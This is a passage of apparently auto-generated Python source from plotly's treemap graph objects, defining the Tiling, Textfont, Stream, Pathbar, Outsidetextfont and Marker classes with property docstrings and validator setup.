either 2:1 or 1:2. When using "squarify", unlike d3
which uses the Golden Ratio i.e. 1.618034, Plotly
applies 1 to increase squares in treemap layouts.
"""
def __init__(
self, arg=None, flip=None, packing=None, pad=None, squarifyratio=None, **kwargs
):
"""
Construct a new Tiling object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Tiling
flip
Determines if the positions obtained from solver are
flipped on each axis.
packing
Determines d3 treemap solver. For more info please
refer to https://github.com/d3/d3-hierarchy#treemap-
tiling
pad
Sets the inner padding (in px).
squarifyratio
When using "squarify" `packing` algorithm, according to
https://github.com/d3/d3-hierarchy/blob/master/README.m
d#squarify_ratio this option specifies the desired
aspect ratio of the generated rectangles. The ratio
must be specified as a number greater than or equal to
one. Note that the orientation of the generated
rectangles (tall or wide) is not implied by the ratio;
for example, a ratio of two will attempt to produce a
mixture of rectangles whose width:height ratio is
either 2:1 or 1:2. When using "squarify", unlike d3
which uses the Golden Ratio i.e. 1.618034, Plotly
applies 1 to increase squares in treemap layouts.
Returns
-------
Tiling
"""
super(Tiling, self).__init__("tiling")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Tiling
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Tiling"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import tiling as v_tiling
# Initialize validators
# ---------------------
self._validators["flip"] = v_tiling.FlipValidator()
self._validators["packing"] = v_tiling.PackingValidator()
self._validators["pad"] = v_tiling.PadValidator()
self._validators["squarifyratio"] = v_tiling.SquarifyratioValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("flip", None)
self["flip"] = flip if flip is not None else _v
_v = arg.pop("packing", None)
self["packing"] = packing if packing is not None else _v
_v = arg.pop("pad", None)
self["pad"] = pad if pad is not None else _v
_v = arg.pop("squarifyratio", None)
self["squarifyratio"] = squarifyratio if squarifyratio is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Textfont(_BaseTraceHierarchyType):
# color
# -----
@property
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# colorsrc
# --------
@property
def colorsrc(self):
"""
Sets the source reference on plot.ly for color .
The 'colorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
the system. The plotly service (at https://plot.ly or on-
premise) generates images on a server, where only a select
number of fonts are installed and supported. These include
"Arial", "Balto", "Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old Standard TT", "Open
Sans", "Overpass", "PT Sans Narrow", "Raleway", "Times New
Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
str|numpy.ndarray
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# familysrc
# ---------
@property
def familysrc(self):
"""
Sets the source reference on plot.ly for family .
The 'familysrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|float|numpy.ndarray
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# sizesrc
# -------
@property
def sizesrc(self):
"""
Sets the source reference on plot.ly for size .
The 'sizesrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
"""
Construct a new Textfont object
Sets the font used for `textinfo`.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Textfont
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
Returns
-------
Textfont
"""
super(Textfont, self).__init__("textfont")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Textfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Textfont"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import textfont as v_textfont
# Initialize validators
# ---------------------
self._validators["color"] = v_textfont.ColorValidator()
self._validators["colorsrc"] = v_textfont.ColorsrcValidator()
self._validators["family"] = v_textfont.FamilyValidator()
self._validators["familysrc"] = v_textfont.FamilysrcValidator()
self._validators["size"] = v_textfont.SizeValidator()
self._validators["sizesrc"] = v_textfont.SizesrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
self["color"] = color if color is not None else _v
_v = arg.pop("colorsrc", None)
self["colorsrc"] = colorsrc if colorsrc is not None else _v
_v = arg.pop("family", None)
self["family"] = family if family is not None else _v
_v = arg.pop("familysrc", None)
self["familysrc"] = familysrc if familysrc is not None else _v
_v = arg.pop("size", None)
self["size"] = size if size is not None else _v
_v = arg.pop("sizesrc", None)
self["sizesrc"] = sizesrc if sizesrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Stream(_BaseTraceHierarchyType):
# maxpoints
# ---------
@property
def maxpoints(self):
"""
Sets the maximum number of points to keep on the plots from an
incoming stream. If `maxpoints` is set to 50, only the newest
50 points will be displayed on the plot.
The 'maxpoints' property is a number and may be specified as:
- An int or float in the interval [0, 10000]
Returns
-------
int|float
"""
return self["maxpoints"]
@maxpoints.setter
def maxpoints(self, val):
self["maxpoints"] = val
# token
# -----
@property
def token(self):
"""
The stream id number links a data trace on a plot with a
stream. See https://plot.ly/settings for more details.
The 'token' property is a string and must be specified as:
- A non-empty string
Returns
-------
str
"""
return self["token"]
@token.setter
def token(self, val):
self["token"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
maxpoints
Sets the maximum number of points to keep on the plots
from an incoming stream. If `maxpoints` is set to 50,
only the newest 50 points will be displayed on the
plot.
token
The stream id number links a data trace on a plot with
a stream. See https://plot.ly/settings for more
details.
"""
def __init__(self, arg=None, maxpoints=None, token=None, **kwargs):
"""
Construct a new Stream object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Stream
maxpoints
Sets the maximum number of points to keep on the plots
from an incoming stream. If `maxpoints` is set to 50,
only the newest 50 points will be displayed on the
plot.
token
The stream id number links a data trace on a plot with
a stream. See https://plot.ly/settings for more
details.
Returns
-------
Stream
"""
super(Stream, self).__init__("stream")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Stream
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Stream"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import stream as v_stream
# Initialize validators
# ---------------------
self._validators["maxpoints"] = v_stream.MaxpointsValidator()
self._validators["token"] = v_stream.TokenValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("maxpoints", None)
self["maxpoints"] = maxpoints if maxpoints is not None else _v
_v = arg.pop("token", None)
self["token"] = token if token is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Pathbar(_BaseTraceHierarchyType):
# edgeshape
# ---------
@property
def edgeshape(self):
"""
Determines which shape is used for edges between `barpath`
labels.
The 'edgeshape' property is an enumeration that may be specified as:
- One of the following enumeration values:
['>', '<', '|', '\\']
- A string that matches one of the following regular expressions:
['']
Returns
-------
Any
"""
return self["edgeshape"]
@edgeshape.setter
def edgeshape(self, val):
self["edgeshape"] = val
# side
# ----
@property
def side(self):
"""
Determines on which side of the the treemap the `pathbar`
should be presented.
The 'side' property is an enumeration that may be specified as:
- One of the following enumeration values:
['top', 'bottom']
Returns
-------
Any
"""
return self["side"]
@side.setter
def side(self, val):
self["side"] = val
# textfont
# --------
@property
def textfont(self):
"""
Sets the font used inside `pathbar`.
The 'textfont' property is an instance of Textfont
that may be specified as:
- An instance of plotly.graph_objs.treemap.pathbar.Textfont
- A dict of string/value properties that will be passed
to the Textfont constructor
Supported dict properties:
color
colorsrc
Sets the source reference on plot.ly for color
.
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for
family .
size
sizesrc
Sets the source reference on plot.ly for size
.
Returns
-------
plotly.graph_objs.treemap.pathbar.Textfont
"""
return self["textfont"]
@textfont.setter
def textfont(self, val):
self["textfont"] = val
# thickness
# ---------
@property
def thickness(self):
"""
Sets the thickness of `pathbar` (in px). If not specified the
`pathbar.textfont.size` is used with 3 pixles extra padding on
each side.
The 'thickness' property is a number and may be specified as:
- An int or float in the interval [12, inf]
Returns
-------
int|float
"""
return self["thickness"]
@thickness.setter
def thickness(self, val):
self["thickness"] = val
# visible
# -------
@property
def visible(self):
"""
Determines if the path bar is drawn i.e. outside the trace
`domain` and with one pixel gap.
The 'visible' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["visible"]
@visible.setter
def visible(self, val):
self["visible"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
edgeshape
Determines which shape is used for edges between
`barpath` labels.
side
Determines on which side of the the treemap the
`pathbar` should be presented.
textfont
Sets the font used inside `pathbar`.
thickness
Sets the thickness of `pathbar` (in px). If not
specified the `pathbar.textfont.size` is used with 3
pixles extra padding on each side.
visible
Determines if the path bar is drawn i.e. outside the
trace `domain` and with one pixel gap.
"""
def __init__(
self,
arg=None,
edgeshape=None,
side=None,
textfont=None,
thickness=None,
visible=None,
**kwargs
):
"""
Construct a new Pathbar object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Pathbar
edgeshape
Determines which shape is used for edges between
`barpath` labels.
side
Determines on which side of the the treemap the
`pathbar` should be presented.
textfont
Sets the font used inside `pathbar`.
thickness
Sets the thickness of `pathbar` (in px). If not
specified the `pathbar.textfont.size` is used with 3
pixles extra padding on each side.
visible
Determines if the path bar is drawn i.e. outside the
trace `domain` and with one pixel gap.
Returns
-------
Pathbar
"""
super(Pathbar, self).__init__("pathbar")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Pathbar
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Pathbar"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import pathbar as v_pathbar
# Initialize validators
# ---------------------
self._validators["edgeshape"] = v_pathbar.EdgeshapeValidator()
self._validators["side"] = v_pathbar.SideValidator()
self._validators["textfont"] = v_pathbar.TextfontValidator()
self._validators["thickness"] = v_pathbar.ThicknessValidator()
self._validators["visible"] = v_pathbar.VisibleValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("edgeshape", None)
self["edgeshape"] = edgeshape if edgeshape is not None else _v
_v = arg.pop("side", None)
self["side"] = side if side is not None else _v
_v = arg.pop("textfont", None)
self["textfont"] = textfont if textfont is not None else _v
_v = arg.pop("thickness", None)
self["thickness"] = thickness if thickness is not None else _v
_v = arg.pop("visible", None)
self["visible"] = visible if visible is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Outsidetextfont(_BaseTraceHierarchyType):
# color
# -----
@property
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# colorsrc
# --------
@property
def colorsrc(self):
"""
Sets the source reference on plot.ly for color .
The 'colorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
the system. The plotly service (at https://plot.ly or on-
premise) generates images on a server, where only a select
number of fonts are installed and supported. These include
"Arial", "Balto", "Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old Standard TT", "Open
Sans", "Overpass", "PT Sans Narrow", "Raleway", "Times New
Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
str|numpy.ndarray
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# familysrc
# ---------
@property
def familysrc(self):
"""
Sets the source reference on plot.ly for family .
The 'familysrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|float|numpy.ndarray
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# sizesrc
# -------
@property
def sizesrc(self):
"""
Sets the source reference on plot.ly for size .
The 'sizesrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
"""
Construct a new Outsidetextfont object
Sets the font used for `textinfo` lying outside the sector.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
plotly.graph_objs.treemap.Outsidetextfont
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
Returns
-------
Outsidetextfont
"""
super(Outsidetextfont, self).__init__("outsidetextfont")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Outsidetextfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Outsidetextfont"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import outsidetextfont as v_outsidetextfont
# Initialize validators
# ---------------------
self._validators["color"] = v_outsidetextfont.ColorValidator()
self._validators["colorsrc"] = v_outsidetextfont.ColorsrcValidator()
self._validators["family"] = v_outsidetextfont.FamilyValidator()
self._validators["familysrc"] = v_outsidetextfont.FamilysrcValidator()
self._validators["size"] = v_outsidetextfont.SizeValidator()
self._validators["sizesrc"] = v_outsidetextfont.SizesrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
self["color"] = color if color is not None else _v
_v = arg.pop("colorsrc", None)
self["colorsrc"] = colorsrc if colorsrc is not None else _v
_v = arg.pop("family", None)
self["family"] = family if family is not None else _v
_v = arg.pop("familysrc", None)
self["familysrc"] = familysrc if familysrc is not None else _v
_v = arg.pop("size", None)
self["size"] = size if size is not None else _v
_v = arg.pop("sizesrc", None)
self["sizesrc"] = sizesrc if sizesrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Marker(_BaseTraceHierarchyType):
# autocolorscale
# --------------
@property
def autocolorscale(self):
"""
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.colorscale`. Has an effect only if colorsis set to a
numerical array. In case `colorscale` is unspecified or
`autocolorscale` is true, the default palette will be chosen
according to whether numbers in the `color` array are all
positive, all negative or mixed.
The 'autocolorscale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["autocolorscale"]
@autocolorscale.setter
def autocolorscale(self, val):
self["autocolorscale"] = val
# cauto
# -----
@property
def cauto(self):
"""
Determines whether or not the color domain is computed with
respect to the input data (here colors) or the bounds set in
`marker.cmin` and `marker.cmax` Has an effect only if colorsis
set to a numerical array. Defaults to `false` when
`marker.cmin` and `marker.cmax` are set by the user.
The 'cauto' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["cauto"]
@cauto.setter
def cauto(self, val):
self["cauto"] = val
# cmax
# ----
@property
def cmax(self):
"""
Sets the upper bound of the color domain. Has an effect only if
colorsis set to a numerical array. Value should have the same
units as colors and if set, `marker.cmin` must be set as well.
The 'cmax' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmax"]
@cmax.setter
def cmax(self, val):
self["cmax"] = val
# cmid
# ----
@property
def cmid(self):
"""
Sets the mid-point of the color domain by scaling `marker.cmin`
and/or `marker.cmax` to be equidistant to this point. Has an
effect only if colorsis set to a numerical array. Value should
have the same units as colors. Has no effect when
`marker.cauto` is `false`.
The 'cmid' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmid"]
@cmid.setter
def cmid(self, val):
self["cmid"] = val
# cmin
# ----
@property
def cmin(self):
"""
Sets the lower bound of the color domain. Has an effect only if
colorsis set to a numerical array. Value should have the same
units as colors and if set, `marker.cmax` must be set as well.
The 'cmin' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmin"]
@cmin.setter
def cmin(self, val):
self["cmin"] = val
# coloraxis
# ---------
@property
def coloraxis(self):
"""
Sets a reference to a shared color axis. References to these
shared color axes are "coloraxis", "coloraxis2", "coloraxis3",
etc. Settings for these shared color axes are set in the
layout, under `layout.coloraxis`, `layout.coloraxis2`, etc.
Note that multiple color scales can be linked to the same color
axis.
The 'coloraxis' property is an identifier of a particular
subplot, of type 'coloraxis', that may be specified as the string 'coloraxis'
optionally followed by an integer >= 1
(e.g. 'coloraxis', 'coloraxis1', 'coloraxis2', 'coloraxis3', etc.)
Returns
-------
str
"""
return self["coloraxis"]
@coloraxis.setter
def coloraxis(self, val):
self["coloraxis"] = val
# colorbar
# --------
@property
def colorbar(self):
"""
The 'colorbar' property is an instance of ColorBar
that may be specified as:
- An instance of plotly.graph_objs.treemap.marker.ColorBar
- A dict of string/value properties that will be passed
to the ColorBar constructor
Supported dict properties:
bgcolor
Sets the color of padded area.
bordercolor
Sets the axis line color.
borderwidth
Sets the width (in px) or the border enclosing
this color bar.
dtick
Sets the step in-between ticks on this axis.
Use with `tick0`. Must be a positive number, or
special strings available to "log" and "date"
axes. If the axis `type` is "log", then ticks
are set every 10^(n*dtick) where n is the tick
number. For example, to set a tick mark at 1,
10, 100, 1000, ... set dtick to 1. To set tick
marks at 1, 100, 10000, ... set dtick to 2. To
set tick marks at 1, 5, 25, 125, 625, 3125, ...
set dtick to log_10(5), or 0.69897000433. "log"
has several special values; "L<f>", where `f`
is a positive number, gives ticks linearly
spaced in value (but not position). For example
`tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10
plus small digits between, use "D1" (all
digits) or "D2" (only 2 and 5). `tick0` is
ignored for "D1" and "D2". If the axis `type`
is "date", then you must convert the time to
milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to
86400000.0. "date" also has special values
"M<n>" gives ticks spaced by a number of
months. `n` must be a positive integer. To set
ticks on the 15th of every third month, set
`tick0` to "2000-01-15" and `dtick` to "M3". To
set ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick
exponents. For example, consider the number
1,000,000,000. If "none", it appears as
1,000,000,000. If "e", 1e+9. If "E", 1E+9. If
"power", 1x10^9 (with 9 in a super script). If
"SI", 1G. If "B", 1B.
len
Sets the length of the color bar This measure
excludes the padding of both ends. That is, the
color bar length is this length minus the
padding on both ends.
lenmode
Determines whether this color bar's length
(i.e. the measure in the color variation
direction) is set in units of plot "fraction"
or in *pixels. Use `len` to set the value.
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks
will be chosen automatically to be less than or
equal to `nticks`. Has an effect only if
`tickmode` is set to "auto".
outlinecolor
Sets the axis line color.
outlinewidth
Sets the width (in px) of the axis line.
separatethousands
If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of
the first tick is shown. If "last", only the
exponent of the last tick is shown. If "none",
no exponents appear.
showticklabels
Determines whether or not the tick labels are
drawn.
showtickprefix
If "all", all tick labels are displayed with a
prefix. If "first", only the first tick is
displayed with a prefix. If "last", only the
last tick is displayed with a suffix. If
"none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
thickness
Sets the thickness of the color bar This
measure excludes the size of the padding, ticks
and labels.
thicknessmode
Determines whether this color bar's thickness
(i.e. the measure in the constant color
direction) is set in units of plot "fraction"
or in "pixels". Use `thickness` to set the
value.
tick0
Sets the placement of the first tick on this
axis. Use with `dtick`. If the axis `type` is
"log", then you must take the log of your
starting tick (e.g. to set the starting tick to
100, set the `tick0` to 2) except when
`dtick`=*L<f>* (see `dtick` for more info). If
